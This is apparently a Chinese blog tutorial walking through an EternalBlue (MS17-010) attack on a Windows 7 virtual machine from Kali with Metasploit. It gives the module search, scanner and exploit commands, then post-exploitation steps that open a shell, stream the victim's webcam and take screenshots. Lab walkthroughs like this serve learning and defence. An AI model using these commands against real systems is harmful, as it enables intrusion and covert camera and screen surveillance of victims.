[虚拟机]KaLi 对 windows7的永恒之蓝漏洞的利用

KaLi 对 windows7的永恒之蓝漏洞的利用

1. 首先我们要知道window7的IP地址，cmd中输入ipconfig中得知

2. 打开kali的终端，看看能不能ping通win7的ip

如下图就是没得问题了

3. Kali终端中打开msfc，search ms17_010

输入msfconsole出现如图，每次加载都是不一样的图片哦！！

再输入指令

search ms17_010

#下的1是我们要使用的第一个模块，目的是用来扫描win7系统是否存在这个漏洞 我们输入

use 1
show options

这个时候我们要用到之前了解到的win7的IP，继续输入

set rhosts 刚才获取的ip
show options

然后我们看到了如下图：红框内就是我们刚才输入的ip地址

run

当初先如图的时候，我们的第一个环节结束，意思就是win7这个系统可以被利用

4、再打开一个终端，我们要开始攻击了

同样的步骤，终端中打开msfconsole，然后search ms17_010，然后use 2（这里使用use 2的意思就是要攻击了，1只是用来扫描），继续show options，再次set rhosts 刚才win7的ip地址，然后我们run

5、攻击成功后的成果获取

我们看到了最下面大大的——WIN—— nice ，攻击成功了，现在我们来挨个实现我们的操作： （1）我们先来控制一下win7的摄像头，指令如下：

webcam_stream

也许这个时候会报错，那说明你的win7摄像头没有，如何确定自己win7的摄像头开了呢，如下图，就是win7开着摄像头呢

胜利的比yeah！！！！

（2）拿shell 指令就一句话

shell

第二个红框内就是win7的cmd，我们通过这个来看一下win7的ip地址

（3）截图 先退出win7的cmd后我们输入

输入指令后kali界面就会跳出一个截图。

以上就是全部内容，谢谢大家，希望可以学到一些东西。